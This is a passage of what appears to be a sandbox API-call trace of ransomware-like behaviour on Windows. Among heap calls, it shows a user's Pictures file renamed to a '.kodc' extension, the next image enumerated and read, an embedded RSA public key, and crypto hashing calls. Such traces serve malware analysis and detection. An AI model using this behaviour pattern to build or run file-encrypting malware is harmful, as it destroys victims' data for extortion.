Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bd10 [0099.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bd58 [0099.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.649] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x655c00 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x6868a0 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.651] GetCurrentThreadId () returned 0x42c [0099.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5978 [0099.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.652] GetCurrentThreadId () returned 0x42c [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79e0 [0099.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0099.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9bd58 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.658] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x70aa, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x70aa, lpOverlapped=0x0) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.658] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x70af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.658] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.658] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.659] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.659] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.659] CloseHandle (hObject=0x5cc) returned 1 [0099.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.679] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lrp6Blp6FKC5uB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lrp6blp6fkc5ub.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lrp6Blp6FKC5uB.png.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lrp6blp6fkc5ub.png.kodc")) returned 1 [0099.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.680] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.681] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e54840, ftCreationTime.dwHighDateTime=0x1d5b7bf, ftLastAccessTime.dwLowDateTime=0x3520d1d0, ftLastAccessTime.dwHighDateTime=0x1d5c08e, ftLastWriteTime.dwLowDateTime=0x3520d1d0, ftLastWriteTime.dwHighDateTime=0x1d5c08e, nFileSizeHigh=0x0, nFileSizeLow=0xe053, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oI-TD-U-0TkXRG.bmp", cAlternateFileName="OI-TD-~1.BMP")) returned 1 [0099.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.681] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oI-TD-U-0TkXRG.bmp") returned=".bmp" [0099.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oI-TD-U-0TkXRG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oi-td-u-0tkxrg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.681] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=57427) returned 1 [0099.681] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.685] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe02d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.685] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.686] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.686] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe053, lpOverlapped=0x0) returned 1 [0099.686] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.686] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.686] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.686] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.687] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.687] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.687] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.687] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.687] GetLastError () returned 0x0 [0099.688] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.688] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.688] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.688] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 